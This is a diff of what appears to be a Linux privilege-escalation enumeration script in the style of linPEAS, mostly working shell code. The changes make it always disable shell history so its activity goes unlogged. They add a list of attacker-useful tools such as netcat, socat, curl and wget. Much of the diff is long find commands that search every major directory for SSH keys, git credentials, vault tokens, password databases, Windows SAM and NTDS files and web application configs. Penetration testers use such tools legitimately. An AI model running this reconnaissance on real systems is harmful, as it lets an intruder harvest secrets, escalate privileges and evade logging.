+511,7 @@ profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh| knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com" -timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" +timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer" commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" @@ -520,13 +520,13 @@ ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client6 dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism" -CONTAINER_CMDS="docker lxc rkt kubectl podman runc" +USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 rkt ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/null | proc proc |/dev/console" -INT_HIDDEN_FILES="._history.|.bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.pem|.pfx|.pgp|.plan|.profile|.pypirc|.rdg|.recently-used.xbel|.rhosts|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc" +INT_HIDDEN_FILES=".bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pypirc|.rdg|.recently-used.xbel|.rhosts|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc" ########################################### #---------) Checks before start (---------# @@ -585,7 +585,7 @@ echo_no (){ } print_title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -602,11 +602,37 @@ print_title(){ START_T1_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"════════════════════════════════════╣ $GREEN$1${BLUE} ╠════════════════════════════════════\n"$NC + title=$1 + title_len=$(echo $title | wc -c) + max_title_len=100 + rest_len=$((($max_title_len - $title_len) / 2)) + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╔" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╗" + + echo "" + + for i in $(seq 1 $rest_len); do printf "═"; done + printf "╣ $GREEN${title}${BLUE} ╠" + for i in $(seq 1 $rest_len); do printf "═"; done + + echo "" + + printf ${BLUE} + for i in $(seq 1 $rest_len); do printf " "; done + printf "╚" + for i in $(seq 1 $title_len); do printf "═"; done; printf "═"; + printf "╝" + + printf $NC + echo "" } print_2title(){ - if [ "$VERBOSE" ]; then + if [ "$DEBUG" ]; then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) @@ -865,14 +891,469 @@ discovery_port_scan (){ #---) Exporting history env variables (---# ########################################### -if ! [ "$NOTEXPORT" ]; then - unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH - export HISTFILE=/dev/null - export HISTSIZE=0 - export HISTFILESIZE=0 +unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH +export HISTFILE=/dev/null +export HISTSIZE=0 +export HISTFILESIZE=0 + + + +########################################### +#-----------) Some Basic Info (-----------# +########################################### + +print_title "Basic information" +printf $LG"OS: "$NC +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," +printf $LG"User & Groups: "$NC +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g" +printf $LG"Hostname: "$NC +hostname 2>/dev/null +printf $LG"Writable folder: "$NC; +echo $Wfolder +if [ "$DISCOVER_BAN_GOOD" ]; then + printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" +else + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" +fi + +if [ "$SCAN_BAN_GOOD" ]; then + printf $YELLOW"[+] $SCAN_BAN_GOOD\n$NC" +else + printf $RED"[-] $SCAN_BAN_BAD\n$NC" +fi +if [ "$(command -v nmap 2>/dev/null)" ];then + NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" + printf $YELLOW"[+] $NMAP_GOOD\n$NC" +fi +echo "" +echo "" + +########################################### +#--------) Check if network jobs (--------# +########################################### +if [ "$PORTS" ]; then + if [ "$SCAN_BAN_GOOD" ]; then + if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then + printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + else + #Select the correct configuration of the netcat found + select_nc + fi + else + printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; + printf ${BLUE}"$HELP"$NC; + exit 0 + fi +fi + +if [ "$DISCOVERY" ]; then + if [ "$PORTS" ]; then + discovery_port_scan $DISCOVERY $PORTS + else + if [ "$DISCOVER_BAN_GOOD" ]; then + discover_network $DISCOVERY + else + printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; + fi + fi + exit 0 + +elif [ "$IP" ]; then + select_nc + tcp_port_scan $IP "$PORTS" + exit 0 fi +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then + ########################################### + #----------) Caching Finds (--------------# + ########################################### + + printf $GREEN"Caching directories "$NC + + + #Get home + HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" + if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi + GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" + + CONT_THREADS=0 + # FIND ALL KNOWN INTERESTING SOFTWARE FILES + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"mysql\" -o -name \"cacti\" -o -name \"system.d\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"bind\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"pam.d\" -o -name \"system-connections\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"bind\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"zabbix\" -o -name \"neo4j\" -o -name \"couchdb\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \".vnc\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"environments\" -o -name \"ldap\" -o -name \".svn\" -o -name \"seeddms*\" -o -name \"bind\" -o -name \"keyrings\" -o -name \"logstash\" -o -name \"roundcube\" -o -name \"sites-enabled\" -o -name \"sentry\" -o -name \"postfix\" -o -name \".irssi\" -o -name \".password-store\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" -o -name \"datasources.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"known_hosts\" -o -name \"*.gnupg\" -o -name \"iis6.log\" -o -name \"*vnc*.ini\" -o -name \".plan\" -o -name \".rhosts\" -o -name \"000-default.conf\" -o -name \"*config*.php\" -o -name \".env\" -o -name \"*.csr\" -o -name \"index.dat\" -o -name \"gitlab.rm\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"jetty-realm.properties\" -o -name \".git\" -o -name \"unattend.xml\" -o -name \"*vnc*.c*nf*\" -o -name \"passwd\" -o -name \"storage.php\" -o -name \"autologin.conf\" -o -name \"gitlab.yml\" -o -name \"web*.config\" -o -name \"mariadb.cnf\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"backup\" -o -name \".recently-used.xbel\" -o -name \"sysprep.xml\" -o -name \"id_rsa*\" -o -name \"*.der\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \"postgresql.conf\" -o -name \"passbolt.php\" -o -name \"FreeSSHDservice.ini\" -o -name \"database.php\" -o -name \"docker.socket\" -o -name \"KeePass.enforced*\" -o -name \"access.log\" -o -name \".lesshst\" -o -name \"*credential*\" -o -name \"azureProfile.json\" -o -name \"SYSTEM\" -o -name \"vault-ssh-helper.hcl\" -o -name \"hostapd.conf\" -o -name \"setupinfo\" -o -name \"wp-config.php\" -o -name \".secrets.mkey\" -o -name \"krb5.conf\" -o -name \"Ntds.dit\" -o -name \"*.viminfo\" -o -name \"Dockerfile\" -o -name \"mosquitto.conf\" -o -name \"scheduledtasks.xml\" -o -name \"settings.php\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"*.rdg\" -o -name \"recentservers.xml\" -o -name \"php.ini\" -o -name \"AzureRMContext.json\" -o -name \"ipsec.conf\" -o -name \"*.pfx\" -o -name \"docker.sock\" -o -name \"id_dsa*\" -o -name \".gitconfig\" -o -name \"winscp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"ffftp.ini\" -o -name \"mongod*.conf\" -o -name \"racoon.conf\" -o -name \"pgsql.conf\" -o -name \"*vnc*.txt\" -o -name \"scclient.exe\" -o -name \"krb5.keytab\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"accessTokens.json\" -o -name \"*.jks\" -o -name \"SAM\" -o -name \"protecteduserkey.bin\" -o -name \"*.timer\" -o -name \"https.conf\" -o -name \"*.key\" -o -name \".wgetrc\" -o -name \"NetSetup.log\" -o -name \"rsyncd.secrets\" -o -name \"pgadmin*.db\" -o -name \"psk.txt\" -o -name \"*.pem\" -o -name \"snmpd.conf\" -o -name \"ftp.ini\" -o -name \"*.ovpn\" -o -name \".github\" -o -name \"wsl.exe\" -o -name \"ConsoleHost_history.txt\" -o -name \".bashrc\" -o -name \"*.keystore\" -o -name \".k5login\" -o -name \"bash.exe\" -o -name \"appcmd.exe\" -o -name \"supervisord.conf\" -o -name \".profile\" -o -name \"sysprep.inf\" -o -name \"ws_ftp.ini\" -o -name \"*.sqlite\" -o -name \"*.keyring\" -o -name \"*.kdbx\" -o -name \".htpasswd\" -o -name \"*.psk\" -o -name \"unattended.xml\" -o -name \".msmtprc\" -o -name \"sentry.conf.py\" -o -name \"anaconda-ks.cfg\" -o -name \"https-xampp.conf\" -o -name \"KeePass.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"groups.xml\" -o -name \"cloud.cfg\" -o -name \"*.crt\" -o -name \"*.cer\" -o -name \"autologin\" -o -name \"error.log\" -o -name \"printers.xml\" -o -name \"credentials\" -o -name \"fastcgi_params\" -o -name \"wcx_ftp.ini\" -o -name \"backups\" -o -name \"*vnc*.xml\" -o -name \"my.cnf\" -o -name \"influxdb.conf\" -o -name \"hosts.equiv\" -o -name \"creds*\" -o -name \"*.socket\" -o -name \"gvm-tools.conf\" -o -name \"*.pgp\" -o -name \"access_tokens.json\" -o -name \"tomcat-users.xml\" -o -name \"*.sqlite3\" -o -name \"zabbix_server.conf\" -o -name \"*_history*\" -o -name \"SecEvent.Evt\" -o -name \"kcpassword\" -o -name \"docker-compose.yml\" -o -name \"my.ini\" -o -name \".git-credentials\" -o -name \"authorized_keys\" -o -name \"authorized_hosts\" -o -name \"sitemanager.xml\" -o -name \"pg_hba.conf\" -o -name \".vault-token\" -o -name \"secrets.yml\" -o -name \"*.p12\" -o -name \"filezilla.xml\" -o -name \"RDCMan.settings\" -o -name \"secrets.ldb\" -o -name \"ntuser.dat\" -o -name \"system.sav\" -o -name \"software\" -o -name \".ldaprc\" -o -name \"TokenCache.dat\" -o -name \"server.xml\" -o -name \"legacy_credentials.db\" -o -name \"security.sav\" -o -name \"default.sav\" -o -name \"sssd.conf\" -o -name \"rsyncd.conf\" -o -name \"*.swp\" -o -name \"httpd.conf\" -o -name \"redis.conf\" -o -name \"credentials.db\" -o -name \"unattend.inf\" -o -name \"ipsec.secrets\" -o -name \".pypirc\" -o -name \"*password*\" -o -name \".google_authenticator\" -o -name \"*.service\" -o -name \"KeePass.config*\" -o -name \"sites.ini\" -o -name \"unattend.txt\" -o -name \"setupinfo.bak\" -o -name \"pagefile.sys\" -o -name \"kibana.y*ml\" -o -name \"zabbix_agentd.conf\" -o -name \"db.php\" -o -name \"ddclient.conf\" -o -name \"*.ftpconfig\" -o -name \"debian.cnf\" 